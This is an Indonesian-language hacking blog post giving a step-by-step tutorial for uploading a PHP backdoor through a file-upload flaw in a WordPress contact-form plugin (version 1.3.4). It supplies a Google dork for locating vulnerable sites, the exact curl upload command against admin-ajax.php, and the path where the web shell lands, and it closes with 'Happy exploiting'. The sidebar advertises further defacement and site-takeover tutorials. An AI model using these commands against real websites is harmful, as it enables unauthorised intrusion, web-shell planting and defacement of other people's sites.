• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

April 14, 2015 by Jack Wilder 1 Comment

Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :
Google Dorks :
intitle: index of /uploads/contact_files/
– use your brain, bitch !

Shell location :
http://victim/wp-content/uploads/contact_files/backdoor.php
Tested on :
BackBox Linux

Anggap sudah meneumuakn target.
Sekarang masuk terminal linux.
jackwilder@suckseed ~ % mkdir exp
jackwilder@suckseed ~ % cd exp

Kita membuat folder exp dan masuk ke direktori tersebut .
Lalu kita masukkan backdoor kita disitu.
Misalkan saya membuat backdoor x.php di folder exp tadi.
Lalu masukkan command berikut :
curl -k -X POST -F “action=upload” -F “Filedata=@./[backdoor.php]” -F “action=nm_webcontact_upload_file” http://target/wp-admin/admin-ajax.php
Contoh :
Disana tertulis :
{“status”:”uploaded”,”filename”:”1428981565-x.php“}%
Maka shell akan berada di :
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php

Sekian dan semoga bermanfaat .
Happy exploiting 🙂

Shares

Filed Under: WordPress Exploit Tagged With: Bugs, Exploit, Hacking, Linux, Wordpress

Reader Interactions

Comments

  1. Trio Gempar Surya Giri says

    March 12, 2017 at 5:11 am

    (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k)

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

WordPress Army Knife CSRF File Upload Vulnerability

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

WordPress 4.7.0/4.7.1 Content Injection Exploit

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Tumblr Custom Domain or Subdomain Takeover

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

GitHub Custom Domain or Subdomain Takeover

Cara Mudah Hack cPanel dengan Fitur Reset Password

Cara Deface Website dengan Teknik Local File Inclusion

LinuxSec / 73 queries in 0.10 seconds